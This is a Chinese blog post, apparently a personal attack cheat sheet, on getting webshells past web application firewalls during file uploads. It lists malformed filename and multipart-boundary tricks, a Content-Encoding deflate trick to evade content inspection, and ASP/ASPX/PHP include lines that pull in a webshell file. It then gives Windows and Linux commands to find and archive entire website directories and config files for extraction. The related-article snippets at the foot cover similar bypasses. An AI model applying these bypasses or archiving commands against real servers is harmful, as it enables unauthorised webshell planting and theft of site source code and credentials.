上传绕过waf

已于 2024-03-02 14:05:30 修改
阅读量149 收藏
点赞数
文章标签: 网络安全
于 2023-04-24 20:59:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35013491/article/details/130351886
版权

如果目标站点支持https尽量用https进行突破。

493waf

绕过文件名:应该是-的原因字数多了感觉像换行了,不行了试试别的特殊字符和组合

avvfe695d9d-2c30-4337-83b2-b4f6c7cb-b4f6c7cba925fe695d9d-2c30-4337-83b2-b4fe695d9d-2c30-4337-83b2-b4f6c7cba925fe695d9d-2c30-4337-83b2-b4f6c7cba925fe695d9d-2c30-4337-83b2-b4fe695d9d-2c30-4337.aspx

asp的就写入:

<!--#include file="dama.txt"--> 


aspx的就写入:

<!--#include file="dama.txt"--> 


php的就写入:

 <?php require_once ("dama.txt"); ?>

Content-Encoding=deflate 绕过本地防火墙内容检测
腾讯云waf 上传绕过
boundary = 中间空格
boundary= 后面空格

1.文件名换行绕过:
2.filename == 绕过 (使用更多的等号也可以)
3.filename=; 绕过
4.使用垃圾字符填充文件名:

5.如果是aspx的话,
好像都不可行,但是可以变形下
filename=".jpg';filename=='.php"
filename="txt.asPx "
filename="txt.w\ar"
filename="poc:jpg?.a?.s?m?x"

Windows:

查找主站文件路径命令:

where /R D:\www\  /T "cccc.txt"

打包网站:

"C:\Program Files (x86)\WinRAR\Rar.exe"   a -k -r -s -m1 F:\log\log.rar  D:\PlatForm\web\

会打包 目录E:\wwwroot\ 下及子目录下所有以web开头.config结尾的文件。

可以执行 E:\RECYCLER\Rar.exe a -k -r -s -m1 E:\wwwroot\Web\web.rar E:\wwwroot\web*.config

linux

打包当前网站下所有jsp文件

find  ./   -type f  -name "*.jsp"  | xargs  tar  zcvf  kaka.tar

查找主站文件路径命令:

find  /   -type f  -name "zhuazhanlog.gif"

打包网站

tar  zcvf   /tmp/test.tar.gz     /home/wwwroot/test/*
低调求绕过,没事写博客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
任意文件上绕过waf+本地防火墙双重防护
墨痕诉清风的博客
10-28 931
因为这种单位很喜欢将自己的服务器部署在C段的分散的IP上,于是猜测,这个类似官网网站的站点也很有可能就搭建在这个超链接的C段上,我们不妨 host 碰撞一下,如果找到了真实IP的话,那么就可能绕过waf。但是这里内容检测还是过不了,但是不会显示云 waf 地址或者 502了,猜测肯定是过了 cdn, 但是不知道是什么拦截住了(可能为本地的硬件防火墙)时,就可以过内容检测,不知道市面上有没有这种类型的webshell,我找了一圈好像都有。尝试了一下,发现content-Encoding居然可以绕过
文件上绕过waf
qq_45750691的博客
08-24 552
文件上绕过waf safedog 绕过方式 上参数解析:明确哪些东西能修改? content-disposition:一般可更改,就是表单数据 name:表单参数值,不能更改 这个值是固定的,不能更改的,这个是和后端绑定的 filename:文件名不能更改 这个是最关键的 它包含了文件的后缀名 content-type:文件MIME,视情况更改,这是一个绕过条件,我们可以根据它进行绕过,如果对方不是这个绕过条件,就没有意义了 常见绕过方法 数据溢出-防匹配(xxx…) 把数据搞多一点 数
WAF绕过之文件上
最新发布
wangluoanquan111的博客
04-23 1324
环境:安全狗,DVWA我们上一个一句话木马,被拦截!但是我们并不知道waf拦截我们的机制所以我们可以采用控制变量法:准备两个文件:1.txt 和1.php文件中写入相同的内容:<?然后上并抓包1.txt可以成功上:!1.php上失败:!那我们可以先猜测它是通过后缀名来判断的接下来我们在判断是否是通过content-type来进行拦截我们上1.txt文件,抓包修改content-type为:application/octet-stream!
毕业一年,从事运维感觉没有出路,如何转型更有前景?
Python_0011的博客
07-08 490
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
绕过WAF的15中姿势
06-29
绕过WAF进行文件上的文旦,可以学习一些姿势加以利用。
2022年文件上漏洞绕过姿势整理,过waf
11-20
2022年文件上漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
Charset_encoding-Burp:利用字符集编码绕过waf的burpsuite插件
05-18
BurpSuite Plugin通过字符集编码绕过waf的burp插件因为小伙伴在实战中有这么个需求(利用字符集编码绕过waf),所以我借着他的这个需求也学习了下burp插件的编写。预览ASP.NET+IIS使用说明其实这种方法很早就出来了...
WAF绕过+wbehshell免杀-漏洞银行大咖面对面9-ian
07-31
WAF绕过+wbehshell免杀-漏洞银行大咖面对面9-ian
文件上绕过思路总结 - 先知社区1
08-03
1.Accept-Encoding 改变编码类型 2.修改请求方式绕过 3.host头部绕过
xss绕过尖括号和双括号_腾讯云WAF绕过 之 门神waf绕过挑战赛
weixin_35355560的博客
01-07 1070
门神WAF绕过挑战赛No.1起因好友在群里发了个腾讯云的门神waf挑战赛,可以尝试bypass sql注入和xss。钱虽然不多,但是就当给午餐加杯酸奶。https://security.tencent.com/index.php/announcement/msg/189因为最近在做项目,只能中午休息时抽空写文章,主要分享XSS的绕过思路,就不太过细致的分析了随便尝试了几个payload发...
文件上wafwaf拦不住我)
weixin_44110366的博客
11-09 2145
一. 什么是文件上漏洞 Web应用程序通常会有文件上的功能, 例如在 BBS发布图片 , 在个人网站发布ZIP 压缩 包, 在办公平台发布DOC文件等 , 只要 Web应用程序允许上文件, 就有可能存在文件上漏 洞. 1:WTS-WAF 绕过 原内容: Content-Disposition: form-data; name=“up_picture”; filename=“xss.ph...
[By Pass] WAF绕过方式
weixin_43586169的博客
06-08 1075
WAF的多种绕过方式
【文件上漏洞5】waf绕过
qq_41889600的博客
11-16 324
小迪安全 waf绕过
WAF - 文件上绕过安全狗 靶场实战
weixin_54771278的博客
05-29 840
实验介绍 1. 文件上漏洞简介 在文件上的功能处,若服务端脚本语言未对上的文件进行严格验证和过滤,导致恶意用户上恶意的脚本文件时,就有可能获取执行服务端命令的能力,这就是文件上漏洞。 文件上漏洞对Web应用来说是一种非常严重的漏洞。一般情况下,Web应用都会允许用户上一些文件,如头像、附件等信息,如果Web应用没有对用户上的文件进行有效的检查过滤,那么恶意用户就会上一句话木马等Webshell,从而达到控制Web网站的目的 2. WAF工作原理 ...
web安全-数据包参数内容简介-文件上WAF(安全狗)绕过方法
ran的博客
02-03 1168
由编成的知识可以知道一个语句结束的末尾需要添加分号,而参数filename的后面没有分号,由此可知这一整条语句可能到filename就截止了,由此可以猜想如果filename后面加一个分号以后,其后面就可能还可以添加其它内容。因为安全狗的匹配机制是匹配双引号里的内容,但是这里的双引号有前没有后,它就一直在找后面的那个双引号,但是没有找到,所以可能没有匹配到。有的参数值加了双引号,有的参数值没加双引号,由此可以想到加了双引号的就是可以随便修改的,而没加双引号的可能就是有着固定的一些参数值。
WAF绕过-漏洞发现篇-漏洞扫描工具绕过WAF
xiaoheizi的博客
08-04 799
3.来到网站:https://blog.csdn.net/qq_26230421/article/details/99052337 获取各大搜索引擎的蜘蛛UA头,我这里使用的是百度蜘蛛UA:Mozilla/5.0 (compatible;硬件型WAF以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护,是最为统的WAF型态,在受访企业中部署占比为35.2%。这种类型的WAF采用纯软件的方式实现,特点是安装简单,容易使用,成本低。
WAF攻防—绕过IP封锁(代理池)
剁椒鱼头没剁椒的博客
03-09 2467
这篇文章主要是将介绍在进行信息收集或者漏洞扫描等情况下,被WAF拦截了怎么办?被封锁IP了怎么办?可能更多的是被封锁IP,至于被WAF拦截,拦截的更多情况下是payload或者POC被拦截了。Web Application Firewall(web 应用防火墙),一种公认的说法是“web 应用防火墙”通过执行一系列针对 HTTP/HTTPS 的安全策略来专门为 web 应用提供保护的一款产品。
文件上及绕waf扩展思路
nextlubricate的博客
11-09 551
1、换行 2、多个等于号 3、单双引号替换 4、去掉引号 5、溢出Content-Disposition字段 6、多个Content-Disposition字段 7、畸形协议 8、boundary前加减空格 9、删除Content-Type: image/jpeg 10、溢出文件名 11、Accept-Encoding: Accept-Encoding设置在请求头当中,会告诉服务器,我可以接受哪种编码压缩。 Content-Encoding设置在响应头中,会告诉客户端,我用的是哪种编码压
如何防止文件上绕过WAF
05-20
要防止文件上绕过WAF,可以采取以下措施: 1. 文件扩展名过滤:通过对上文件的扩展名进行过滤,只允许上指定类型的文件。同时,需要注意的是,黑名单式的过滤不如白名单式的过滤安全。 2. MIME类型过滤:WAF可以根据文件类型的MIME类型进行过滤,只允许上指定类型的文件。 3. 禁止上可执行文件:禁止上可执行文件,例如.bat、.exe、.sh等文件,可以防止攻击者上恶意程序。 4. 文件大小限制:可以对上文件的大小进行限制,以防止上过大的文件导致服务器崩溃。 5. 随机文件名:将上文件使用随机生成的名称保存,可以防止攻击者针对特定文件进行攻击。 6. 文件内容检测:对上文件的内容进行检测,以防止上包含恶意代码的文件。 7. WAF规则更新:定期更新WAF规则库,以保证WAF能够检测最新的攻击方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值